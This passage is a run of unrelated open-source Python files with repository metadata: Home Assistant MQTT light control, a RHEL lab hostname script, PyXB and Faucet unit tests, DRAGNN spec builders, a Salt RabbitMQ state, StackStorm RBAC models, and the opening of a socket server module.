should_update |= set_optimistic(ATTR_HS_COLOR, hs_color, COLOR_MODE_HS)
if (
hs_color
and self._topic[CONF_XY_COMMAND_TOPIC] is not None
and self._legacy_mode
):
# Legacy mode: Convert HS to XY
xy_color = color_util.color_hs_to_xy(*hs_color)
publish(CONF_XY_COMMAND_TOPIC, f"{xy_color[0]},{xy_color[1]}")
should_update |= set_optimistic(
ATTR_HS_COLOR, hs_color, condition_attribute=ATTR_XY_COLOR
)
if (
(rgb := kwargs.get(ATTR_RGB_COLOR))
and self._topic[CONF_RGB_COMMAND_TOPIC] is not None
and not self._legacy_mode
):
scaled = scale_rgbx(rgb)
rgb_s = render_rgbx(scaled, CONF_RGB_COMMAND_TEMPLATE, COLOR_MODE_RGB)
publish(CONF_RGB_COMMAND_TOPIC, rgb_s)
should_update |= set_optimistic(ATTR_RGB_COLOR, rgb, COLOR_MODE_RGB)
if (
(rgbw := kwargs.get(ATTR_RGBW_COLOR))
and self._topic[CONF_RGBW_COMMAND_TOPIC] is not None
and not self._legacy_mode
):
scaled = scale_rgbx(rgbw)
rgbw_s = render_rgbx(scaled, CONF_RGBW_COMMAND_TEMPLATE, COLOR_MODE_RGBW)
publish(CONF_RGBW_COMMAND_TOPIC, rgbw_s)
should_update |= set_optimistic(ATTR_RGBW_COLOR, rgbw, COLOR_MODE_RGBW)
if (
(rgbww := kwargs.get(ATTR_RGBWW_COLOR))
and self._topic[CONF_RGBWW_COMMAND_TOPIC] is not None
and not self._legacy_mode
):
scaled = scale_rgbx(rgbww)
rgbww_s = render_rgbx(scaled, CONF_RGBWW_COMMAND_TEMPLATE, COLOR_MODE_RGBWW)
publish(CONF_RGBWW_COMMAND_TOPIC, rgbww_s)
should_update |= set_optimistic(ATTR_RGBWW_COLOR, rgbww, COLOR_MODE_RGBWW)
if (
(xy_color := kwargs.get(ATTR_XY_COLOR))
and self._topic[CONF_XY_COMMAND_TOPIC] is not None
and not self._legacy_mode
):
publish(CONF_XY_COMMAND_TOPIC, f"{xy_color[0]},{xy_color[1]}")
should_update |= set_optimistic(ATTR_XY_COLOR, xy_color, COLOR_MODE_XY)
if (
ATTR_BRIGHTNESS in kwargs
and self._topic[CONF_BRIGHTNESS_COMMAND_TOPIC] is not None
):
brightness_normalized = kwargs[ATTR_BRIGHTNESS] / 255
brightness_scale = self._config[CONF_BRIGHTNESS_SCALE]
device_brightness = min(
round(brightness_normalized * brightness_scale), brightness_scale
)
# Make sure the brightness is not rounded down to 0
device_brightness = max(device_brightness, 1)
publish(CONF_BRIGHTNESS_COMMAND_TOPIC, device_brightness)
should_update |= set_optimistic(ATTR_BRIGHTNESS, kwargs[ATTR_BRIGHTNESS])
elif (
ATTR_BRIGHTNESS in kwargs
and ATTR_HS_COLOR not in kwargs
and self._topic[CONF_RGB_COMMAND_TOPIC] is not None
and self._legacy_mode
):
# Legacy mode
hs_color = self._hs_color if self._hs_color is not None else (0, 0)
brightness = kwargs[ATTR_BRIGHTNESS]
rgb = scale_rgbx(color_util.color_hsv_to_RGB(*hs_color, 100), brightness)
rgb_s = render_rgbx(rgb, CONF_RGB_COMMAND_TEMPLATE, COLOR_MODE_RGB)
publish(CONF_RGB_COMMAND_TOPIC, rgb_s)
should_update |= set_optimistic(ATTR_BRIGHTNESS, kwargs[ATTR_BRIGHTNESS])
elif (
ATTR_BRIGHTNESS in kwargs
and ATTR_RGB_COLOR not in kwargs
and self._topic[CONF_RGB_COMMAND_TOPIC] is not None
and not self._legacy_mode
):
rgb_color = self._rgb_color if self._rgb_color is not None else (255,) * 3
rgb = scale_rgbx(rgb_color, kwargs[ATTR_BRIGHTNESS])
rgb_s = render_rgbx(rgb, CONF_RGB_COMMAND_TEMPLATE, COLOR_MODE_RGB)
publish(CONF_RGB_COMMAND_TOPIC, rgb_s)
should_update |= set_optimistic(ATTR_BRIGHTNESS, kwargs[ATTR_BRIGHTNESS])
elif (
ATTR_BRIGHTNESS in kwargs
and ATTR_RGBW_COLOR not in kwargs
and self._topic[CONF_RGBW_COMMAND_TOPIC] is not None
and not self._legacy_mode
):
rgbw_color = (
self._rgbw_color if self._rgbw_color is not None else (255,) * 4
)
rgbw = scale_rgbx(rgbw_color, kwargs[ATTR_BRIGHTNESS])
rgbw_s = render_rgbx(rgbw, CONF_RGBW_COMMAND_TEMPLATE, COLOR_MODE_RGBW)
publish(CONF_RGBW_COMMAND_TOPIC, rgbw_s)
should_update |= set_optimistic(ATTR_BRIGHTNESS, kwargs[ATTR_BRIGHTNESS])
elif (
ATTR_BRIGHTNESS in kwargs
and ATTR_RGBWW_COLOR not in kwargs
and self._topic[CONF_RGBWW_COMMAND_TOPIC] is not None
and not self._legacy_mode
):
rgbww_color = (
self._rgbww_color if self._rgbww_color is not None else (255,) * 5
)
rgbww = scale_rgbx(rgbww_color, kwargs[ATTR_BRIGHTNESS])
rgbww_s = render_rgbx(rgbww, CONF_RGBWW_COMMAND_TEMPLATE, COLOR_MODE_RGBWW)
publish(CONF_RGBWW_COMMAND_TOPIC, rgbww_s)
should_update |= set_optimistic(ATTR_BRIGHTNESS, kwargs[ATTR_BRIGHTNESS])
if (
ATTR_COLOR_TEMP in kwargs
and self._topic[CONF_COLOR_TEMP_COMMAND_TOPIC] is not None
):
color_temp = int(kwargs[ATTR_COLOR_TEMP])
tpl = self._command_templates[CONF_COLOR_TEMP_COMMAND_TEMPLATE]
if tpl:
color_temp = tpl({"value": color_temp})
publish(CONF_COLOR_TEMP_COMMAND_TOPIC, color_temp)
should_update |= set_optimistic(
ATTR_COLOR_TEMP, kwargs[ATTR_COLOR_TEMP], COLOR_MODE_COLOR_TEMP
)
if ATTR_EFFECT in kwargs and self._topic[CONF_EFFECT_COMMAND_TOPIC] is not None:
effect = kwargs[ATTR_EFFECT]
if effect in self._config.get(CONF_EFFECT_LIST):
publish(CONF_EFFECT_COMMAND_TOPIC, effect)
should_update |= set_optimistic(ATTR_EFFECT, effect)
if ATTR_WHITE in kwargs and self._topic[CONF_WHITE_COMMAND_TOPIC] is not None:
percent_white = float(kwargs[ATTR_WHITE]) / 255
white_scale = self._config[CONF_WHITE_SCALE]
device_white_value = min(round(percent_white * white_scale), white_scale)
publish(CONF_WHITE_COMMAND_TOPIC, device_white_value)
should_update |= set_optimistic(
ATTR_BRIGHTNESS,
kwargs[ATTR_WHITE],
COLOR_MODE_WHITE,
)
if (
ATTR_WHITE_VALUE in kwargs
and self._topic[CONF_WHITE_VALUE_COMMAND_TOPIC] is not None
):
percent_white = float(kwargs[ATTR_WHITE_VALUE]) / 255
white_scale = self._config[CONF_WHITE_VALUE_SCALE]
device_white_value = min(round(percent_white * white_scale), white_scale)
publish(CONF_WHITE_VALUE_COMMAND_TOPIC, device_white_value)
should_update |= set_optimistic(ATTR_WHITE_VALUE, kwargs[ATTR_WHITE_VALUE])
if on_command_type == "last":
publish(CONF_COMMAND_TOPIC, self._payload["on"])
should_update = True
if self._optimistic:
# Optimistically assume that the light has changed state.
self._state = True
should_update = True
if should_update:
self.async_write_ha_state()
async def async_turn_off(self, **kwargs):
"""Turn the device off.
This method is a coroutine.
"""
mqtt.async_publish(
self.hass,
self._topic[CONF_COMMAND_TOPIC],
self._payload["off"],
self._config[CONF_QOS],
self._config[CONF_RETAIN],
)
if self._optimistic:
# Optimistically assume that the light has changed state.
self._state = False
self.async_write_ha_state()
|
Danielhiversen/home-assistant
|
homeassistant/components/mqtt/light/schema_basic.py
|
Python
|
apache-2.0
| 41,759
|
#!/usr/bin/env python
PRIMARY_OS = 'RHEL-7.1'
PRIMARY = '''#!/bin/sh
#
FQDN="{fqdn}"
# /etc/hostname - /etc/hosts
sed -i "1 c\\127.0.0.1 $FQDN localhost" /etc/hosts
echo $FQDN > /etc/hostname
service hostname restart
sleep 5
{{dinfo}}
'''
def pre_process():
"""Anything added to this function is executed before launching the instances"""
pass
def post_process():
"""Anything added to this function is executed after launching the instances"""
pass
|
superseb/train
|
train/labs/base/scripts/rhel-7.1.py
|
Python
|
apache-2.0
| 470
|
# -*- coding: utf-8 -*-
import logging
if __name__ == '__main__':
logging.basicConfig()
_log = logging.getLogger(__name__)
import unittest
from pyxb.utils.domutils import *
from xml.dom import Node
import xml.dom
import pyxb.namespace
def NonTextSibling (n):
while n.TEXT_NODE == n.nodeType:
n = n.nextSibling
return n
class TestInScopeNames (unittest.TestCase):
def show (self, node):
xmlns_map = pyxb.namespace.resolution.NamespaceContext.GetNodeContext(node).inScopeNamespaces()
#print '%s: %s' % (node.nodeName, ' ; '.join([ '%s=%s' % (_k, _v.uri()) for (_k, _v) in xmlns_map.items()]))
xmlns_map = xmlns_map.copy()
self.assertEqual(pyxb.namespace.XML.uri(), xmlns_map.pop('xml').uri())
self.assertEqual(pyxb.namespace.XMLNamespaces.uri(), xmlns_map.pop('xmlns').uri())
return xmlns_map
def test_6_2_2 (self):
xml = '''<?xml version="1.0"?>
<!-- initially, the default namespace is "books" -->
<book xmlns='urn:loc.gov:books'
xmlns:isbn='urn:ISBN:0-395-36341-6'>
<title>Cheaper by the Dozen</title>
<isbn:number>1568491379</isbn:number>
<notes>
<p xmlns='http://www.w3.org/1999/xhtml'>
This is a <i>funny</i> book!
</p>
<p>another graf without namespace change</p>
</notes>
</book>'''
book = StringToDOM(xml).documentElement
self.assertEqual('book', book.localName)
ns_ctx = pyxb.namespace.resolution.NamespaceContext.GetNodeContext(book)
xmlns_map = self.show(book)
self.assertEqual(2, len(xmlns_map))
self.assertEqual('urn:loc.gov:books', xmlns_map[None].uri())
self.assertEqual('urn:ISBN:0-395-36341-6', xmlns_map['isbn'].uri())
title = NonTextSibling(book.firstChild)
self.assertEqual('title', title.localName)
xmlns_map =self.show(title)
self.assertEqual(2, len(xmlns_map))
self.assertEqual('urn:loc.gov:books', xmlns_map[None].uri())
self.assertEqual('urn:ISBN:0-395-36341-6', xmlns_map['isbn'].uri())
number = NonTextSibling(title.nextSibling)
notes = NonTextSibling(number.nextSibling)
while notes.TEXT_NODE == notes.nodeType:
notes = notes.nextSibling
self.assertEqual('notes', notes.localName)
p = NonTextSibling(notes.firstChild)
xmlns_map = self.show(p)
self.assertEqual('p', p.localName)
self.assertEqual(2, len(xmlns_map))
self.assertEqual(None, xmlns_map.get('xsi'))
self.assertEqual('http://www.w3.org/1999/xhtml', xmlns_map[None].uri())
self.assertEqual('urn:ISBN:0-395-36341-6', xmlns_map['isbn'].uri())
x = NonTextSibling(p.nextSibling)
xmlns_map = self.show(x)
self.assertEqual('p', x.localName)
self.assertEqual(2, len(xmlns_map))
self.assertEqual('urn:loc.gov:books', xmlns_map[None].uri())
self.assertEqual('urn:ISBN:0-395-36341-6', xmlns_map['isbn'].uri())
def test_6_2_3 (self):
xml = '''<?xml version='1.0'?>
<Beers>
<table xmlns='http://www.w3.org/1999/xhtml'>
<th><td>Name</td><td>Origin</td><td>Description</td></th>
<tr>
<td><brandName xmlns="">Huntsman</brandName></td>
<td><origin xmlns="">Bath, UK</origin></td>
<td>
<details xmlns=""><class>Bitter</class><hop>Fuggles</hop>
<pro>Wonderful hop, light alcohol, good summer beer</pro>
<con>Fragile; excessive variance pub to pub</con>
</details>
</td>
</tr>
</table>
</Beers>'''
Beers = StringToDOM(xml).documentElement
ns_ctx = pyxb.namespace.resolution.NamespaceContext.GetNodeContext(Beers)
xmlns_map = self.show(Beers)
self.assertEqual(0, len(xmlns_map))
table = NonTextSibling(Beers.firstChild)
self.assertEqual('table', table.localName)
xmlns_map = self.show(table)
self.assertEqual(1, len(xmlns_map))
self.assertEqual('http://www.w3.org/1999/xhtml', xmlns_map[None].uri())
th = NonTextSibling(table.firstChild)
self.assertEqual('th', th.localName)
tr = NonTextSibling(th.nextSibling)
self.assertEqual('tr', tr.localName)
#brandName = table.firstChild.nextSibling.nextSibling.nextSibling.firstChild.nextSibling.nextSibling.nextSibling.firstChild
td = NonTextSibling(tr.firstChild)
self.assertEqual('td', td.localName)
brandName = td.firstChild
self.assertEqual('brandName', brandName.localName)
xmlns_map = self.show(brandName)
self.assertEqual(0, len(xmlns_map))
class TestNamespaceURIs (unittest.TestCase):
# Make sure we agree with xml.dom on what the core namespace URIs are
def testURI (self):
self.assertTrue(xml.dom.EMPTY_NAMESPACE is None)
self.assertEqual(xml.dom.XML_NAMESPACE, pyxb.namespace.XML.uri())
self.assertEqual(xml.dom.XMLNS_NAMESPACE, pyxb.namespace.XMLNamespaces.uri())
self.assertEqual(xml.dom.XHTML_NAMESPACE, pyxb.namespace.XHTML.uri())
if '__main__' == __name__:
unittest.main()
|
jonfoster/pyxb-upstream-mirror
|
tests/utils/test-domutils.py
|
Python
|
apache-2.0
| 5,087
|
#!/usr/bin/env python
"""Test GAUGE main."""
# Copyright (C) 2015 Brad Cowie, Christopher Lorier and Joe Stringer.
# Copyright (C) 2015 Research and Innovation Advanced Network New Zealand Ltd.
# Copyright (C) 2015--2019 The Contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
# pylint: disable=no-name-in-module
# pylint: disable=import-error
from faucet.__main__ import parse_args, build_ryu_args
class MainTestCase(unittest.TestCase): # pytype: disable=module-attr
"""Test __main__ methods."""
def test_parse_args(self):
"""Sanity check argument parsing."""
self.assertFalse(parse_args([]).verbose)
self.assertTrue(parse_args(['--verbose']).verbose)
def test_build_ryu_args(self):
"""Test build_ryu_args()."""
self.assertTrue(build_ryu_args(['gauge', '--use-stderr', '--use-syslog', '--verbose']))
self.assertFalse(build_ryu_args(['gauge', '--version']))
if __name__ == "__main__":
unittest.main() # pytype: disable=module-attr
|
trungdtbk/faucet
|
tests/unit/gauge/test_main.py
|
Python
|
apache-2.0
| 1,527
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utils for building DRAGNN specs."""
import tensorflow as tf
from dragnn.protos import spec_pb2
from dragnn.python import lexicon
from syntaxnet.ops import gen_parser_ops
from syntaxnet.util import check
class ComponentSpecBuilder(object):
"""Wrapper to help construct SyntaxNetComponent specifications.
This class will help make sure that ComponentSpec's are consistent with the
expectations of the SyntaxNet Component backend. It contains defaults used to
create LinkFeatureChannel specifications according to the network_unit and
transition_system of the source compnent. It also encapsulates common recipes
for hooking up FML and translators.
Attributes:
spec: The dragnn.ComponentSpec proto.
"""
def __init__(self,
name,
builder='DynamicComponentBuilder',
backend='SyntaxNetComponent'):
"""Initializes the ComponentSpec with some defaults for SyntaxNet.
Args:
name: The name of this Component in the pipeline.
builder: The component builder type.
backend: The component backend type.
"""
self.spec = spec_pb2.ComponentSpec(
name=name,
backend=self.make_module(backend),
component_builder=self.make_module(builder))
def make_module(self, name, **kwargs):
"""Forwards kwargs to easily created a RegisteredModuleSpec.
Note: all kwargs should be string-valued.
Args:
name: The registered name of the module.
**kwargs: Proto fields to be specified in the module.
Returns:
Newly created RegisteredModuleSpec.
"""
return spec_pb2.RegisteredModuleSpec(
registered_name=name, parameters=kwargs)
def default_source_layer(self):
"""Returns the default source_layer setting for this ComponentSpec.
Usually links are intended for a specific layer in the network unit.
For common network units, this returns the hidden layer intended
to be read by recurrent and cross-component connections.
Returns:
String name of default network layer.
Raises:
ValueError: if no default is known for the given setup.
"""
for network, default_layer in [('FeedForwardNetwork', 'layer_0'),
('LayerNormBasicLSTMNetwork', 'state_h_0'),
('LSTMNetwork', 'layer_0'),
('IdentityNetwork', 'input_embeddings')]:
if self.spec.network_unit.registered_name.endswith(network):
return default_layer
raise ValueError('No default source for network unit: %s' %
self.spec.network_unit)
def default_token_translator(self):
"""Returns the default source_translator setting for token representations.
Most links are token-based: given a target token index, retrieve a learned
representation for that token from this component. This depends on the
transition system; e.g. we should make sure that left-to-right sequence
models reverse the incoming token index when looking up representations from
a right-to-left model.
Returns:
String name of default translator for this transition system.
Raises:
ValueError: if no default is known for the given setup.
"""
transition_spec = self.spec.transition_system
if transition_spec.registered_name == 'arc-standard':
return 'shift-reduce-step'
if transition_spec.registered_name in ('shift-only', 'tagger', 'morpher',
'lm-transitions', 'dependency-label',
'category'):
if 'left_to_right' in transition_spec.parameters:
if transition_spec.parameters['left_to_right'] == 'false':
return 'reverse-token'
return 'identity'
raise ValueError('Invalid transition spec: %s' % str(transition_spec))
def add_token_link(self, source=None, source_layer=None, **kwargs):
"""Adds a link to source's token representations using default settings.
Constructs a LinkedFeatureChannel proto and adds it to the spec, using
defaults to assign the name, component, translator, and layer of the
channel. The user must provide fml and embedding_dim.
Args:
source: SyntaxComponentBuilder object to pull representations from.
source_layer: Optional override for a source layer instead of the default.
**kwargs: Forwarded arguments to the LinkedFeatureChannel proto.
"""
if source_layer is None:
source_layer = source.default_source_layer()
self.spec.linked_feature.add(
name=source.spec.name,
source_component=source.spec.name,
source_layer=source_layer,
source_translator=source.default_token_translator(),
**kwargs)
def add_rnn_link(self, source_layer=None, **kwargs):
"""Adds a recurrent link to this component using default settings.
This adds the connection to the previous time step only to the network. It
constructs a LinkedFeatureChannel proto and adds it to the spec, using
defaults to assign the name, component, translator, and layer of the
channel. The user must provide the embedding_dim only.
Args:
source_layer: Optional override for a source layer instead of the default.
**kwargs: Forwarded arguments to the LinkedFeatureChannel proto.
"""
if source_layer is None:
source_layer = self.default_source_layer()
self.spec.linked_feature.add(
name='rnn',
source_layer=source_layer,
source_component=self.spec.name,
source_translator='history',
fml='constant',
**kwargs)
def set_transition_system(self, *args, **kwargs):
"""Shorthand to set transition_system using kwargs."""
self.spec.transition_system.CopyFrom(self.make_module(*args, **kwargs))
def set_network_unit(self, *args, **kwargs):
"""Shorthand to set network_unit using kwargs."""
self.spec.network_unit.CopyFrom(self.make_module(*args, **kwargs))
def add_fixed_feature(self, **kwargs):
"""Shorthand to add a fixed_feature using kwargs."""
self.spec.fixed_feature.add(**kwargs)
def add_link(self,
source,
source_layer=None,
source_translator='identity',
name=None,
**kwargs):
"""Add a link using default naming and layers only."""
if source_layer is None:
source_layer = source.default_source_layer()
if name is None:
name = source.spec.name
self.spec.linked_feature.add(
source_component=source.spec.name,
source_layer=source_layer,
name=name,
source_translator=source_translator,
**kwargs)
def fill_from_resources(self, resource_path, tf_master=''):
"""Fills in feature sizes and vocabularies using SyntaxNet lexicon.
Must be called before the spec is ready to be used to build TensorFlow
graphs. Requires a SyntaxNet lexicon built at the resource_path. Using the
lexicon, this will call the SyntaxNet custom ops to return the number of
features and vocabulary sizes based on the FML specifications and the
lexicons. It will also compute the number of actions of the transition
system.
This will often CHECK-fail if the spec doesn't correspond to a valid
transition system or feature setup.
Args:
resource_path: Path to the lexicon.
tf_master: TensorFlow master executor (string, defaults to '' to use the
local instance).
"""
check.IsTrue(
self.spec.transition_system.registered_name,
'Set a transition system before calling fill_from_resources().')
context = lexicon.create_lexicon_context(resource_path)
# If there are any transition system-specific params or resources,
# copy them over into the context.
for resource in self.spec.resource:
context.input.add(name=resource.name).part.add(
file_pattern=resource.part[0].file_pattern)
for key, value in self.spec.transition_system.parameters.iteritems():
context.parameter.add(name=key, value=value)
context.parameter.add(
name='brain_parser_embedding_dims',
value=';'.join([str(x.embedding_dim) for x in self.spec.fixed_feature]))
context.parameter.add(
name='brain_parser_features',
value=';'.join([x.fml for x in self.spec.fixed_feature]))
context.parameter.add(
name='brain_parser_predicate_maps',
value=';'.join(['' for x in self.spec.fixed_feature]))
context.parameter.add(
name='brain_parser_embedding_names',
value=';'.join([x.name for x in self.spec.fixed_feature]))
context.parameter.add(
name='brain_parser_transition_system',
value=self.spec.transition_system.registered_name)
# Propagate information from SyntaxNet C++ backends into the DRAGNN
# self.spec.
with tf.Session(tf_master) as sess:
feature_sizes, domain_sizes, _, num_actions = sess.run(
gen_parser_ops.feature_size(task_context_str=str(context)))
self.spec.num_actions = int(num_actions)
for i in xrange(len(feature_sizes)):
self.spec.fixed_feature[i].size = int(feature_sizes[i])
self.spec.fixed_feature[i].vocabulary_size = int(domain_sizes[i])
for i in xrange(len(self.spec.linked_feature)):
self.spec.linked_feature[i].size = len(
self.spec.linked_feature[i].fml.split(' '))
del self.spec.resource[:]
for resource in context.input:
self.spec.resource.add(name=resource.name).part.add(
file_pattern=resource.part[0].file_pattern)
def complete_master_spec(master_spec, lexicon_corpus, output_path,
tf_master=''):
"""Finishes a MasterSpec that defines the network config.
Given a MasterSpec that defines the DRAGNN architecture, completes the spec so
that it can be used to build a DRAGNN graph and run training/inference.
Args:
master_spec: MasterSpec.
lexicon_corpus: the corpus to be used with the LexiconBuilder.
output_path: directory to save resources to.
tf_master: TensorFlow master executor (string, defaults to '' to use the
local instance).
Returns:
None, since the spec is changed in-place.
"""
if lexicon_corpus:
lexicon.build_lexicon(output_path, lexicon_corpus)
# Use Syntaxnet builder to fill out specs.
for i, spec in enumerate(master_spec.component):
builder = ComponentSpecBuilder(spec.name)
builder.spec = spec
builder.fill_from_resources(output_path, tf_master=tf_master)
master_spec.component[i].CopyFrom(builder.spec)
def default_targets_from_spec(spec):
"""Constructs a default set of TrainTarget protos from a DRAGNN spec.
For each component in the DRAGNN spec, it adds a training target for that
component's oracle. It also stops unrolling the graph with that component. It
skips any 'shift-only' transition systems which have no oracle. E.g.: if there
are three components, a 'shift-only', a 'tagger', and a 'arc-standard', it
will construct two training targets, one for the tagger and one for the
arc-standard parser.
Arguments:
spec: DRAGNN spec.
Returns:
List of TrainTarget protos.
"""
component_targets = [
spec_pb2.TrainTarget(
name=component.name,
max_index=idx + 1,
unroll_using_oracle=[False] * idx + [True])
for idx, component in enumerate(spec.component)
if not component.transition_system.registered_name.endswith('shift-only')
]
return component_targets
|
cshallue/models
|
research/syntaxnet/dragnn/python/spec_builder.py
|
Python
|
apache-2.0
| 12,239
|
# -*- coding: utf-8 -*-
'''
Manage RabbitMQ Clusters
========================
Example:
.. code-block:: yaml
rabbit@rabbit.example.com:
rabbitmq_cluster.join:
- user: rabbit
- host: rabbit.example.com
'''
from __future__ import absolute_import
# Import python libs
import logging
# Import salt libs
import salt.utils
log = logging.getLogger(__name__)
def __virtual__():
'''
Only load if RabbitMQ is installed.
'''
return salt.utils.which('rabbitmqctl') is not None
def joined(name, host, user='rabbit', ram_node=None, runas='root'):
'''
Ensure the current node joined to a cluster with node user@host
name
Irrelevant, not used (recommended: user@host)
user
The user of node to join to (default: rabbit)
host
The host of node to join to
ram_node
Join node as a RAM node
runas
The user to run the rabbitmq command as
'''
ret = {'name': name, 'result': True, 'comment': '', 'changes': {}}
status = __salt__['rabbitmq.cluster_status']()
if '{0}@{1}'.format(user, host) in status:
ret['comment'] = 'Already in cluster'
return ret
if not __opts__['test']:
result = __salt__['rabbitmq.join_cluster'](host,
user,
ram_node,
runas=runas)
if 'Error' in result:
ret['result'] = False
ret['comment'] = result['Error']
return ret
elif 'Join' in result:
ret['comment'] = result['Join']
# If we've reached this far before returning, we have changes.
ret['changes'] = {'old': '', 'new': '{0}@{1}'.format(user, host)}
if __opts__['test']:
ret['result'] = None
ret['comment'] = 'Node is set to join cluster {0}@{1}'.format(
user, host)
return ret
# Alias join to preserve backward compat
join = salt.utils.alias_function(joined, 'join')
|
smallyear/linuxLearn
|
salt/salt/states/rabbitmq_cluster.py
|
Python
|
apache-2.0
| 2,051
|
# Copyright 2020 The StackStorm Authors.
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from st2client.models import core
__all__ = ["Role", "UserRoleAssignment"]
class Role(core.Resource):
_alias = "role"
_display_name = "Role"
_plural = "Roles"
_plural_display_name = "Roles"
_repr_attributes = ["id", "name", "system"]
_url_path = "rbac/roles"
class UserRoleAssignment(core.Resource):
_alias = "role-assignment"
_display_name = "Role Assignment"
_plural = "RoleAssignments"
_plural_display_name = "Role Assignments"
_repr_attributes = ["id", "role", "user", "is_remote"]
_url_path = "rbac/role_assignments"
|
StackStorm/st2
|
st2client/st2client/models/rbac.py
|
Python
|
apache-2.0
| 1,243
|
"""Generic socket server classes.
This module tries to capture the various aspects of defining a server:
For socket-based servers:
- address family:
- AF_INET{,6}: IP (Internet Protocol) sockets (default)
- AF_UNIX: Unix domain sockets
- others, e.g. AF_DECNET are conceivable (see <socket.h>
- socket type:
- SOCK_STREAM (reliable stream, e.g. TCP)
- SOCK_DGRAM (datagrams, e.g. UDP)
For request-based servers (including socket-based):
- client address verification before further looking at the request
(This is actually a hook for any processing that needs to look
at the request before anything else, e.g. logging)
- how to handle multiple requests:
- synchronous (one request is handled at a time)
- forking (each request is handled by a new process)
- threading (each request is handled by a new thread)
The classes in this module favor the server type that is simplest to
write: a synchronous TCP/IP server. This is bad class design, but
save some typing. (There's also the issue that a deep class hierarchy
slows down method lookups.)
There are five classes in an inheritance diagram, four of which represent
synchronous servers of four types:
+------------+
| BaseServer |
+------------+
|
v
+-----------+ +------------------+
| TCPServer |------->| UnixStreamServer |
+-----------+ +------------------+
|
v
+-----------+ +--------------------+
| UDPServer |------->| UnixDatagramServer |
+-----------+ +--------------------+
Note that UnixDatagramServer derives from UDPServer, not from
UnixStreamServer -- the only difference between an IP and a Unix
stream server is the address family, which is simply repeated in both
unix server classes.
Forking and threading versions of each type of server can be created
using the ForkingMixIn and ThreadingMixIn mix-in classes. For
instance, a threading UDP server class is created as follows:
class ThreadingUDPServer(ThreadingMixIn, UDPServer): pass
The Mix-in class must come first, since it overrides a method defined
in UDPServer! Setting the various member variables also changes
the behavior of the underlying server mechanism.
To implement a service, you must derive a class from
BaseRequestHandler and redefine its handle() method. You can then run
various versions of the service by combining one of the server classes
with your request handler class.
The request handler class must be different for datagram or stream
services. This can be hidden by using the request handler
subclasses StreamRequestHandler or DatagramRequestHandler.
Of course, you still have to use your head!
For instance, it makes no sense to use a forking server if the service
contains state in memory that can be modified by requests (since the
modifications in the child process would never reach the initial state
kept in the parent process and passed to each child). In this case,
you can use a threading server, but you will probably have to use
locks to avoid two requests that come in nearly simultaneous to apply
conflicting changes to the server state.
On the other hand, if you are building e.g. an HTTP server, where all
data is stored externally (e.g. in the file system), a synchronous
class will essentially render the service "deaf" while one request is
being handled -- which may be for a very long time if a client is slow
to read all the data it has requested. Here a threading or forking
server is appropriate.
In some cases, it may be appropriate to process part of a request
synchronously, but to finish processing in a forked child depending on
the request data. This can be implemented by using a synchronous
server and doing an explicit fork in the request handler class
handle() method.
Another approach to handling multiple simultaneous requests in an
environment that supports neither threads nor fork (or where these are
too expensive or inappropriate for the service) is to maintain an
explicit table of partially finished requests and to use select() to
decide which request to work on next (or whether to handle a new
incoming request). This is particularly important for stream services
where each client can potentially be connected for a long time (if
threads or subprocesses cannot be used).
Future work:
- Standard classes for Sun RPC (which uses either UDP or TCP)
- Standard mix-in classes to implement various authentication
and encryption schemes
- Standard framework for select-based multiplexing
XXX Open problems:
- What to do with out-of-band data?
BaseServer:
- split generic "request" functionality out into BaseServer class.
Copyright (C) 2000 Luke Kenneth Casson Leighton <lkcl@samba.org>
example: read entries from a SQL database (requires overriding
get_request() to return a table entry from the database).
entry is processed by a RequestHandlerClass.
"""
# Author of the BaseServer patch: Luke Kenneth Casson Leighton
# XXX Warning!
# There is a test suite for this module, but it cannot be run by the
# standard regression test.
# To run it manually, run Lib/test/test_socketserver.py.
__version__ = "0.4"
import _pydev_socket as socket
import _pydev_select as select
import sys
import os
try:
import _pydev_threading as threading
except ImportError:
import dummy_threading as threading
__all__ = ["TCPServer","UDPServer","ForkingUDPServer","ForkingTCPServer",
"ThreadingUDPServer","ThreadingTCPServer","BaseRequestHandler",
"StreamRequestHandler","DatagramRequestHandler",
"ThreadingMixIn", "ForkingMixIn"]
if hasattr(socket, "AF_UNIX"):
__all__.extend(["UnixStreamServer","UnixDatagramServer",
"ThreadingUnixStreamServer",
"ThreadingUnixDatagramServer"])
class BaseServer:
"""Base class for server classes.
Methods for the caller:
- __init__(server_address, RequestHandlerClass)
- serve_forever(poll_interval=0.5)
- shutdown()
- handle_request() # if you do not use serve_forever()
- fileno() -> int # for select()
Methods that may be overridden:
- server_bind()
- server_activate()
- get_request() -> request, client_address
- handle_timeout()
- verify_request(request, client_address)
- server_close()
- process_request(request, client_address)
- shutdown_request(request)
- close_request(request)
- handle_error()
Methods for derived classes:
- finish_request(request, client_address)
Class variables that may be overridden by derived classes or
instances:
- timeout
- address_family
- socket_type
- allow_reuse_address
Instance variables:
- RequestHandlerClass
- socket
"""
timeout = None
def __init__(self, server_address, RequestHandlerClass):
"""Constructor. May be extended, do not override."""
self.server_address = server_address
self.RequestHandlerClass = RequestHandlerClass
self.__is_shut_down = threading.Event()
self.__shutdown_request = False
def server_activate(self):
"""Called by constructor to activate the server.
May be overridden.
"""
pass
def serve_forever(self, poll_interval=0.5):
"""Handle one request at a time until shutdown.
Polls for shutdown every poll_interval seconds. Ignores
self.timeout. If you need to do periodic tasks, do them in
